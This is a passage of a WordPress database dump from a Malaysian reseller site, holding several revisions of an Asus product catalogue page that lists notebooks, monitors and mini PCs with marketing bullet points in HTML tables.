to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-20 15:55:17','2018-12-20 07:55:17','',1442,'https://bintara.com.my/blog/2018/12/20/1442-revision-v1/',0,'revision','',0),(2670,1,'2019-09-18 16:11:46','2019-09-18 08:11:46','<h2>NOTEBOOK</h2>\n<table style=\"height: 217px;\" width=\"1104\">\n<tbody>\n<tr>\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>\n\n\n<h2>MONITOR</h2>\n<table style=\"height: 781px;\" width=\"578\">\n<tbody>\n<tr>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\n\n<ul>\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\n\n<ul>\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\n 	<li>Frameless design suitable for multi-display use</li>\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\n</ul>\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\n\n<ul>\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n<tr>\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\n\n<ul>\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\n 	<li>Embedded wall mount hole for multiple using scenario</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\n\n<ul>\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\n\n<ul>\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n<tr>\n<td colspan=\"3\" width=\"601\">\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\n\n<ul>\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>\n<h3>DESKTOP</h3>\n<table style=\"height: 887px;\" width=\"645\">\n<tbody>\n<tr>\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\n\n<ul>\n 	<li>Windows 10 Home or other editions available</li>\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\n\n<ul>\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">&nbsp;\n\n&nbsp;\n\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\n\n<ul>\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n<tr>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\n\n<ul>\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\n\n<ul>\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\n 	<li>ASUS Control Center: Server-grade IT management software</li>\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\n\n<ul>\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n<tr>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\n\n<div class=\"product-intro\">\n<ul>\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\n 	<li>Quiet and energy-efficient performance, even at full load</li>\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\n</ul>\n</div>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\n\n<ul>\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\n 	<li>Windows 10 Pro (other editions available)</li>\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\n 	<li>Quiet and energy-efficient performance, even at full load</li>\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n<td width=\"200\">\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\n\n<ul>\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\n</ul>\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>','Asus','','inherit','closed','closed','','1442-autosave-v1','','','2019-09-18 16:11:46','2019-09-18 08:11:46','',1442,'https://bintara.com.my/blog/2018/12/20/1442-autosave-v1/',0,'revision','',0),(2671,1,'2018-12-20 17:03:27','2018-12-20 09:03:27','[vfb id=6]','Get Quotation (Asus)','','publish','closed','closed','','get-quotation-asus','','','2018-12-20 17:04:01','2018-12-20 09:04:01','',0,'https://bintara.com.my/?page_id=2671',0,'page','',0),(3199,1,'2019-09-18 16:11:49','2019-09-18 08:11:49','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>DESKTOP</h3>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" 